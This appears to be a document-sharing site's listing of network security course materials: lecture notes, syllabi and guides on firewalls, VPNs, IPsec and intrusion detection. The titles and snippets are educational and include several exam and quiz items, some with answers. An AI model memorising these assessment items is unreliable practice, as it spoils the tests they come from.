Network Access Security. Lesson 10 Network Access Security Lesson 10 Objectives Exam Objective Matrix Technology Skill Covered Exam Objective Exam Objective Number Firewalls Given a scenario, install and configure routers and switches.

More information

INTRUSION DETECTION SYSTEMS and Network Security

INTRUSION DETECTION SYSTEMS and Network Security INTRUSION DETECTION SYSTEMS and Network Security Intrusion Detection System IDS A layered network security approach starts with : A well secured system which starts with: Up-to-date application and OS

More information

Chapter 8 Security Pt 2

Chapter 8 Security Pt 2 Chapter 8 Security Pt 2 IC322 Fall 2014 Computer Networking: A Top Down Approach 6 th edition Jim Kurose, Keith Ross Addison-Wesley March 2012 All material copyright 1996-2012 J.F Kurose and K.W. Ross,

More information

Content Teaching Academy at James Madison University

Content Teaching Academy at James Madison University Content Teaching Academy at James Madison University 1 2 The Battle Field: Computers, LANs & Internetworks 3 Definitions Computer Security - generic name for the collection of tools designed to protect

More information

CS 665: Computer System Security. Network Security. Usage environment. Sources of vulnerabilities. Information Assurance Module

CS 665: Computer System Security. Network Security. Usage environment. Sources of vulnerabilities. Information Assurance Module CS 665: Computer System Security Network Security Bojan Cukic Lane Department of Computer Science and Electrical Engineering West Virginia University 1 Usage environment Anonymity Automation, minimal human

More information

Chapter 4: Security of the architecture, and lower layer security (network security) 1

Chapter 4: Security of the architecture, and lower layer security (network security) 1 Chapter 4: Security of the architecture, and lower layer security (network security) 1 Outline Security of the architecture Access control Lower layer security Data link layer VPN access Wireless access

More information

: Network Security. Name of Staff: Anusha Linda Kostka Department : MSc SE/CT/IT

: Network Security. Name of Staff: Anusha Linda Kostka Department : MSc SE/CT/IT Subject Code Department Semester : Network Security : XCS593 : MSc SE : Nineth Name of Staff: Anusha Linda Kostka Department : MSc SE/CT/IT Part A (2 marks) 1. What are the various layers of an OSI reference

More information

Internet Privacy Options

Internet Privacy Options 2 Privacy Internet Privacy Sirindhorn International Institute of Technology Thammasat University Prepared by Steven Gordon on 19 June 2014 Common/Reports/internet-privacy-options.tex, r892 1 Privacy Acronyms

More information

This chapter describes how to set up and manage VPN service in Mac OS X Server.

This chapter describes how to set up and manage VPN service in Mac OS X Server. 6 Working with VPN Service 6 This chapter describes how to set up and manage VPN service in Mac OS X Server. By configuring a Virtual Private Network (VPN) on your server you can give users a more secure

More information

Information Technology Career Cluster Introduction to Cybersecurity Course Number: 11.48100

Information Technology Career Cluster Introduction to Cybersecurity Course Number: 11.48100 Information Technology Career Cluster Introduction to Cybersecurity Course Number: 11.48100 Course Description: Introduction to Cybersecurity is designed to provide students the basic concepts and terminology

More information

Security vulnerabilities in the Internet and possible solutions

Security vulnerabilities in the Internet and possible solutions Security vulnerabilities in the Internet and possible solutions 1. Introduction The foundation of today's Internet is the TCP/IP protocol suite. Since the time when these specifications were finished in

More information

APNIC elearning: IPSec Basics. Contact: training@apnic.net. esec03_v1.0

APNIC elearning: IPSec Basics. Contact: training@apnic.net. esec03_v1.0 APNIC elearning: IPSec Basics Contact: training@apnic.net esec03_v1.0 Overview Virtual Private Networks What is IPsec? Benefits of IPsec Tunnel and Transport Mode IPsec Architecture Security Associations

More information

Client Server Registration Protocol

Client Server Registration Protocol Client Server Registration Protocol The Client-Server protocol involves these following steps: 1. Login 2. Discovery phase User (Alice or Bob) has K s Server (S) has hash[pw A ].The passwords hashes are

More information

IPv6 SECURITY. May 2011. The Government of the Hong Kong Special Administrative Region

IPv6 SECURITY. May 2011. The Government of the Hong Kong Special Administrative Region IPv6 SECURITY May 2011 The Government of the Hong Kong Special Administrative Region The contents of this document remain the property of, and may not be reproduced in whole or in part without the express

More information

Network System Design Lesson Objectives

Network System Design Lesson Objectives Network System Design Lesson Unit 1: INTRODUCTION TO NETWORK DESIGN Assignment Customer Needs and Goals Identify the purpose and parts of a good customer needs report. Gather information to identify network

More information

Firewalls. Chapter 3

Firewalls. Chapter 3 Firewalls Chapter 3 1 Border Firewall Passed Packet (Ingress) Passed Packet (Egress) Attack Packet Hardened Client PC Internet (Not Trusted) Hardened Server Dropped Packet (Ingress) Log File Internet Border

More information

VPN SECURITY. February 2008. The Government of the Hong Kong Special Administrative Region

VPN SECURITY. February 2008. The Government of the Hong Kong Special Administrative Region VPN SECURITY February 2008 The Government of the Hong Kong Special Administrative Region The contents of this document remain the property of, and may not be reproduced in whole or in part without the

More information

VPN. Date: 4/15/2004 By: Heena Patel Email:hpatel4@stevens-tech.edu

VPN. Date: 4/15/2004 By: Heena Patel Email:hpatel4@stevens-tech.edu VPN Date: 4/15/2004 By: Heena Patel Email:hpatel4@stevens-tech.edu What is VPN? A VPN (virtual private network) is a private data network that uses public telecommunicating infrastructure (Internet), maintaining

More information

JOB READY ASSESSMENT BLUEPRINT COMPUTER NETWORKING FUNDAMENTALS - PILOT. Test Code: 4514 Version: 01

JOB READY ASSESSMENT BLUEPRINT COMPUTER NETWORKING FUNDAMENTALS - PILOT. Test Code: 4514 Version: 01 JOB READY ASSESSMENT BLUEPRINT COMPUTER NETWORKING FUNDAMENTALS - PILOT Test Code: 4514 Version: 01 Specific Competencies and Skills Tested in this Assessment: PC Principles Identify physical and equipment

More information

a) Encryption is enabled on the access point. b) The conference room network is on a separate virtual local area network (VLAN)

a) Encryption is enabled on the access point. b) The conference room network is on a separate virtual local area network (VLAN) MIS5206 Week 12 Your Name Date 1. Which significant risk is introduced by running the file transfer protocol (FTP) service on a server in a demilitarized zone (DMZ)? a) User from within could send a file

More information

Security. Contents. S-72.3240 Wireless Personal, Local, Metropolitan, and Wide Area Networks 1

Security. Contents. S-72.3240 Wireless Personal, Local, Metropolitan, and Wide Area Networks 1 Contents Security requirements Public key cryptography Key agreement/transport schemes Man-in-the-middle attack vulnerability Encryption. digital signature, hash, certification Complete security solutions

More information

Wireless Security Overview. Ann Geyer Partner, Tunitas Group Chair, Mobile Healthcare Alliance 209-754-9130 ageyer@tunitas.com

Wireless Security Overview. Ann Geyer Partner, Tunitas Group Chair, Mobile Healthcare Alliance 209-754-9130 ageyer@tunitas.com Wireless Security Overview Ann Geyer Partner, Tunitas Group Chair, Mobile Healthcare Alliance 209-754-9130 ageyer@tunitas.com Ground Setting Three Basics Availability Authenticity Confidentiality Challenge

More information

7.1. Remote Access Connection

7.1. Remote Access Connection 7.1. Remote Access Connection When a client uses a dial up connection, it connects to the remote access server across the telephone system. Windows client and server operating systems use the Point to

More information

Secure Network Design: Designing a DMZ & VPN

Secure Network Design: Designing a DMZ & VPN Secure Network Design: Designing a DMZ & VPN DMZ : VPN : pet.ece.iisc.ernet.in/chetan/.../vpn- PPTfinal.PPT 1 IT352 Network Security Najwa AlGhamdi Introduction DMZ stands for DeMilitarized Zone. A network

More information

Internet Firewall CSIS 3230. Internet Firewall. Spring 2012 CSIS 4222. net13 1. Firewalls. Stateless Packet Filtering

Internet Firewall CSIS 3230. Internet Firewall. Spring 2012 CSIS 4222. net13 1. Firewalls. Stateless Packet Filtering Internet Firewall CSIS 3230 A combination of hardware and software that isolates an organization s internal network from the Internet at large Ch 8.8: Packet filtering, firewalls, intrusion detection Ch

More information

Lecture 10: Virtual LANs (VLAN) and Virtual Private Networks (VPN)

Lecture 10: Virtual LANs (VLAN) and Virtual Private Networks (VPN) Lecture 10: Virtual LANs (VLAN) and Virtual Private Networks (VPN) Prof. Shervin Shirmohammadi SITE, University of Ottawa Prof. Shervin Shirmohammadi CEG 4185 10-1 Virtual LANs Description: Group of devices

More information

Cornerstones of Security

Cornerstones of Security Internet Security Cornerstones of Security Authenticity the sender (either client or server) of a message is who he, she or it claims to be Privacy the contents of a message are secret and only known to

More information

Overview of Network Security The need for network security Desirable security properties Common vulnerabilities Security policy designs

Overview of Network Security The need for network security Desirable security properties Common vulnerabilities Security policy designs Overview of Network Security The need for network security Desirable security properties Common vulnerabilities Security policy designs Why Network Security? Keep the bad guys out. (1) Closed networks

More information

INF3510 Information Security University of Oslo Spring 2011. Lecture 9 Communication Security. Audun Jøsang

INF3510 Information Security University of Oslo Spring 2011. Lecture 9 Communication Security. Audun Jøsang INF3510 Information Security University of Oslo Spring 2011 Lecture 9 Communication Security Audun Jøsang Outline Network security concepts Communication security Perimeter security Protocol architecture

More information

A host-based firewall can be used in addition to a network-based firewall to provide multiple layers of protection.

A host-based firewall can be used in addition to a network-based firewall to provide multiple layers of protection. A firewall is a software- or hardware-based network security system that allows or denies network traffic according to a set of rules. Firewalls can be categorized by their location on the network: A network-based

More information

13 Virtual Private Networks 13.1 Point-to-Point Protocol (PPP) 13.2 Layer 2/3/4 VPNs 13.3 Multi-Protocol Label Switching 13.4 IPsec Transport Mode

13 Virtual Private Networks 13.1 Point-to-Point Protocol (PPP) 13.2 Layer 2/3/4 VPNs 13.3 Multi-Protocol Label Switching 13.4 IPsec Transport Mode 13 Virtual Private Networks 13.1 Point-to-Point Protocol (PPP) PPP-based remote access using dial-in PPP encryption control protocol (ECP) PPP extensible authentication protocol (EAP) 13.2 Layer 2/3/4

More information

Chapter 8 Security. IC322 Fall 2014. Computer Networking: A Top Down Approach. 6 th edition Jim Kurose, Keith Ross Addison-Wesley March 2012

Chapter 8 Security. IC322 Fall 2014. Computer Networking: A Top Down Approach. 6 th edition Jim Kurose, Keith Ross Addison-Wesley March 2012 Chapter 8 Security IC322 Fall 2014 Computer Networking: A Top Down Approach 6 th edition Jim Kurose, Keith Ross Addison-Wesley March 2012 All material copyright 1996-2012 J.F Kurose and K.W. Ross, All

More information

Other VPNs TLS/SSL, PPTP, L2TP. Advanced Computer Networks SS2005 Jürgen Häuselhofer

Other VPNs TLS/SSL, PPTP, L2TP. Advanced Computer Networks SS2005 Jürgen Häuselhofer Other VPNs TLS/SSL, PPTP, L2TP Advanced Computer Networks SS2005 Jürgen Häuselhofer Overview Introduction to VPNs Why using VPNs What are VPNs VPN technologies... TLS/SSL Layer 2 VPNs (PPTP, L2TP, L2TP/IPSec)

More information

Post-Class Quiz: Telecommunication & Network Security Domain

Post-Class Quiz: Telecommunication & Network Security Domain 1. What type of network is more likely to include Frame Relay, Switched Multi-megabit Data Services (SMDS), and X.25? A. Local area network (LAN) B. Wide area network (WAN) C. Intranet D. Internet 2. Which

More information

DATA SECURITY 1/12. Copyright Nokia Corporation 2002. All rights reserved. Ver. 1.0

DATA SECURITY 1/12. Copyright Nokia Corporation 2002. All rights reserved. Ver. 1.0 DATA SECURITY 1/12 Copyright Nokia Corporation 2002. All rights reserved. Ver. 1.0 Contents 1. INTRODUCTION... 3 2. REMOTE ACCESS ARCHITECTURES... 3 2.1 DIAL-UP MODEM ACCESS... 3 2.2 SECURE INTERNET ACCESS

More information

Firewalls. Ahmad Almulhem March 10, 2012

Firewalls. Ahmad Almulhem March 10, 2012 Firewalls Ahmad Almulhem March 10, 2012 1 Outline Firewalls The Need for Firewalls Firewall Characteristics Types of Firewalls Firewall Basing Firewall Configurations Firewall Policies and Anomalies 2

More information

EUCIP - IT Administrator. Module 5 IT Security. Version 2.0

EUCIP - IT Administrator. Module 5 IT Security. Version 2.0 EUCIP - IT Administrator Module 5 IT Security Version 2.0 Module 5 Goals Module 5 Module 5, IT Security, requires the candidate to be familiar with the various ways of protecting data both in a single

More information

Chapter 7 Transport-Level Security

Chapter 7 Transport-Level Security Cryptography and Network Security Chapter 7 Transport-Level Security Lectured by Nguyễn Đức Thái Outline Web Security Issues Security Socket Layer (SSL) Transport Layer Security (TLS) HTTPS Secure Shell

More information

12/8/2015. Review. Final Exam. Network Basics. Network Basics. Network Basics. Network Basics. 12/10/2015 Thursday 5:30~6:30pm Science S-3-028

12/8/2015. Review. Final Exam. Network Basics. Network Basics. Network Basics. Network Basics. 12/10/2015 Thursday 5:30~6:30pm Science S-3-028 Review Final Exam 12/10/2015 Thursday 5:30~6:30pm Science S-3-028 IT443 Network Security Administration Instructor: Bo Sheng True/false Multiple choices Descriptive questions 1 2 Network Layers Application

More information

20-CS-6053-00X Network Security Spring, 2014. An Introduction To. Network Security. Week 1. January 7

20-CS-6053-00X Network Security Spring, 2014. An Introduction To. Network Security. Week 1. January 7 20-CS-6053-00X Network Security Spring, 2014 An Introduction To Network Security Week 1 January 7 Attacks Criminal: fraud, scams, destruction; IP, ID, brand theft Privacy: surveillance, databases, traffic

More information

Network Security. Vorlesung Kommunikation und Netze SS 10 E. Nett

Network Security. Vorlesung Kommunikation und Netze SS 10 E. Nett Network Security Internet not originally designed with (much) security in mind original vision: a group of mutually trusting users attached to a transparent network Security considerations in all layers!

More information

Chapter 12 Supporting Network Address Translation (NAT)

Chapter 12 Supporting Network Address Translation (NAT) [Previous] [Next] Chapter 12 Supporting Network Address Translation (NAT) About This Chapter Network address translation (NAT) is a protocol that allows a network with private addresses to access information

More information

Final exam review, Fall 2005 FSU (CIS-5357) Network Security

Final exam review, Fall 2005 FSU (CIS-5357) Network Security Final exam review, Fall 2005 FSU (CIS-5357) Network Security Instructor: Breno de Medeiros 1. What is an insertion attack against a NIDS? Answer: An insertion attack against a network intrusion detection

More information

INFORMATION SECURITY PRINCIPLES AND PRACTICE

INFORMATION SECURITY PRINCIPLES AND PRACTICE INFORMATION SECURITY PRINCIPLES AND PRACTICE Mark Stamp San Jose State University 'INTERSCIENCE A JOHN WILEY & SONS, INC., PUBLICATION Preface About The Author Acknowledgments xv xix xxi 1 INTRODUCTION

More information

Internet Services & Protocols

Internet Services & Protocols Department of Computer Science Institute for System Architecture, Chair for Computer Networks Internet Services & Protocols Internet (In)Security Dr.-Ing. Stephan Groß Room: INF 3099 E-Mail: stephan.gross@tu-dresden.de

More information

Firewalls, IDS and IPS

Firewalls, IDS and IPS Session 9 Firewalls, IDS and IPS Prepared By: Dr. Mohamed Abd-Eldayem Ref.: Corporate Computer and Network Security By: Raymond Panko Basic Firewall Operation 2. Internet Border Firewall 1. Internet (Not

More information

Appendix A: Configuring Firewalls for a VPN Server Running Windows Server 2003

Appendix A: Configuring Firewalls for a VPN Server Running Windows Server 2003 http://technet.microsoft.com/en-us/library/cc757501(ws.10).aspx Appendix A: Configuring Firewalls for a VPN Server Running Windows Server 2003 Updated: October 7, 2005 Applies To: Windows Server 2003 with

More information

Based on Computer Networking, 4 th Edition by Kurose and Ross

Based on Computer Networking, 4 th Edition by Kurose and Ross Computer Networks Ethernet Hubs and Switches Based on Computer Networking, 4 th Edition by Kurose and Ross Ethernet dominant wired LAN technology: cheap $20 for NIC first widely used LAN technology Simpler,

More information

Virtual Private Networks

Virtual Private Networks Virtual Private Networks The Ohio State University Columbus, OH 43210 Jain@cse.ohio-State.Edu http://www.cse.ohio-state.edu/~jain/ 1 Overview Types of VPNs When and why VPN? VPN Design Issues Security

More information

Security+ Guide to Network Security Fundamentals, Third Edition. Chapter 12 Applying Cryptography

Security+ Guide to Network Security Fundamentals, Third Edition. Chapter 12 Applying Cryptography Security+ Guide to Network Security Fundamentals, Third Edition Chapter 12 Applying Cryptography Objectives Define digital certificates List the various types of digital certificates and how they are used

More information

Proxy Server, Network Address Translator, Firewall. Proxy Server

Proxy Server, Network Address Translator, Firewall. Proxy Server Proxy Server, Network Address Translator, Firewall 1 Proxy Server 2 1 Introduction What is a proxy server? Acts on behalf of other clients, and presents requests from other clients to a server. Acts as

More information

INTRODUCTION TO FIREWALL SECURITY

INTRODUCTION TO FIREWALL SECURITY INTRODUCTION TO FIREWALL SECURITY SESSION 1 Agenda Introduction to Firewalls Types of Firewalls Modes and Deployments Key Features in a Firewall Emerging Trends 2 Printed in USA. What Is a Firewall DMZ

More information

Securing TCP/IP, Chapter 6. Overview: Introduction to TCP/IP; Open Systems Interconnection Model; Anatomy of a Packet; Internet Protocol Security (IPSec); Web Security (HTTP over TLS, Secure-HTTP). Lecturer: Pei-yih Ting

Chapter 6: Electronic Mail Security. Cryptography and Network Security, lectured by Nguyễn Đức Thái. Outline: Pretty Good Privacy; S/MIME. Electronic Mail Security: In virtually all distributed environments,

Network Security. Tampere Seminar, 23rd October 2008. Copyright 2008 Hirschmann Automation and Control GmbH. Contents: Overview; Switch Security; Firewalls; Conclusion

Key Management (Distribution and Certification) (1). Remaining problem of the public key approach: How to ensure that the public key received is really the one of the sender? Illustration of the problem

Security in Wireless LANs and Mobile Networks (12/3/08). Wireless Magnifies Exposure Vulnerability; Mobility Makes it Difficult to Establish Trust. Information going across the wireless link is exposed to anyone within radio range; RF may extend beyond a room or

Networking Technology Online Course Outline. Introduction: Welcome to InfoComm University; About InfoComm International; About Networking Technology; Network Technology Course

Security (II). ISO 7498-2: Security Architecture of OSI Reference Model. EE5723/EE4723, Spring 2012. Course Outline, Fundamental Topics: System View of Network Security; Network Security Model; Security Threat Model & Security Services Model; Overview of Network Security; Security Basis: Cryptography; Secret

E-Commerce Security, Lecture 7 (Security). The Client-Side Vulnerabilities; Securing the Data Transaction. An e-commerce security system has four fronts: Web Client Security; Data Transport Security; Web Server Security; Operating System Security. A safe e-commerce system

Basic Networking Concepts. 1. Introduction; 2. Protocols; 3. Protocol Layers; 4. Network Interconnection/Internet. 1. Introduction: A network can be defined as a group of computers and other devices connected

Architecture Overview. Design Fundamentals: The networks discussed in this paper have some common design fundamentals, including segmentation into modules, which enables network traffic to be isolated and

CMPT 471 Networking II: Firewalls. Janice Regan, 2006-2013. Security: When is a computer secure? When the data and software on the computer are available on demand only to those people who should have access

Layered protocol (service) architecture. The Internet is complex! Many pieces: hosts, access network, routers, links of various media, applications, protocols. Question: Is there any hope of organizing a structure

Transport Level Security: Overview. Raj Jain, Washington University in Saint Louis, Saint Louis, MO 63130. Jain@cse.wustl.edu. Audio/Video recordings of this lecture are available at: http://www.cse.wustl.edu/~jain/cse571-14/

NETWORK SECURITY (W/LAB) Course Syllabus. 6111 E. Skelly Drive, P. O. Box 477200, Tulsa, OK 74147-7200. Course Number: NTWK-0008; OHLAP Credit: Yes; OCAS Code: 8131; Course Length: 130 Hours; Career Cluster: Information

Security+ Guide to Network Security Fundamentals, Fourth Edition. Chapter 6: Network Security. Objectives: List the different types of network security devices and explain how they can be used; Define network

Lecture 17 - Network Security. CMPSC 443 - Spring 2012, Introduction to Computer and Network Security, Professor Jaeger, www.cse.psu.edu/~tjaeger/cse443-s12/ Idea: Why don't we just integrate some of these neat

Fundamentals of Network Security - Theory and Practice. Program: Day 1: 1. General Security Concepts; 2. Identifying Potential Risks. Day 2: 3. Infrastructure and Connectivity; 4. Monitoring

Firewalls. NETWORK (AND DATA) SECURITY 2015/2016, PEDRO BRANDÃO, MANUEL EDUARDO CORREIA. Slides are based on slides by Dr Lawrie Brown (UNSW@ADFA) for Computer

Implementing Secured Converged Wide Area Networks (ISCW), Version 1.0. Course Overview: Implementing Secure Converged Wide Area Networks (ISCW) v1.0 is an advanced instructor-led course that introduces techniques and features that enable or enhance WAN and remote access solutions.

Network Security, by David G. Messerschmitt. Secure and Insecure Authentication; Security Flaws in Public Servers; Firewalls and Packet Filtering. Supplementary section for Understanding Networked Applications: A First Course, Morgan Kaufmann, 1999. Copyright notice: Permission is granted to copy and distribute

CS 356 Lecture 19 and 20: Firewalls and Intrusion Prevention. Spring 2013. Review: Chapter 1: Basic Concepts and Terminology; Chapter 2: Basic Cryptographic Tools; Chapter 3: User Authentication; Chapter 4: Access

ISM/ISC Middleware Module. Lecture 13: Security for Middleware Applications. Dr Geoff Sharman, Visiting Professor in Computer Science, Birkbeck College, Sept 07. Lecture 13 aims to: Show why

Network Concepts. IT 4823 Information Security Concepts and Administration, March 17: Network Threats. The Network Environment; Resilience; Network Topology; Transmission Media. Notice: This session is being recorded. Happy 50th, Vanguard II (March 17, 1958). R.I.P. John Backus (March 17, 2007). Copyright

Recommended IP Telephony Architecture. Report Number: I332-009R-2006. Systems and Network Attack Center (SNAC). Updated: 1 May 2006, Version 1.0. SNAC.Guides@nsa.gov. Warnings

Högskolan i Halmstad, Sektionen för Informationsvetenskap, Data- Och Elektroteknik (IDÉ), Ola Lundh. Written Exam in Network Security, ANSWERS, May 28, 2009. Allowed aid: Writing material. Name (in block letters):

Securing Modern Substations With an Open Standard Network Security Solution. Kevin Leech, Schweitzer Engineering Laboratories, Inc. Copyright SEL 2009. What Makes a Cyberattack Unique? While the resources

Firewalls. CEN 448 Security and Internet Protocols, Chapter 20: Firewalls. Dr. Mostafa Hassan Dahshan, Computer Engineering Department, College of Computer and Information Sciences, King Saud University, mdahshan@ccis.ksu.edu.sa

Chapter 4: Network Layer. A note on the use of these ppt slides: We're making these slides freely available to all (faculty, students, readers). They're in PowerPoint form so you can add, modify, and delete

1.264 Lecture 37. Telecom: Enterprise networks, VPN. Enterprise networks: Connections within enterprise; External connections: Remote offices, Employees, Customers, Business partners, supply chain partners, Patients

Lecture 8 Mobile Networks: Security in Wireless LANs and Mobile Networks. Wireless Networks and Mobile Systems. Lecture Objectives: Introduce security vulnerabilities and defenses; Describe security functions. Agenda; References

SY0-201. ...system so that an unauthorized individual can take over an authorized session, or to disrupt service to authorized users. From a high-level standpoint, attacks on computer systems and networks can be grouped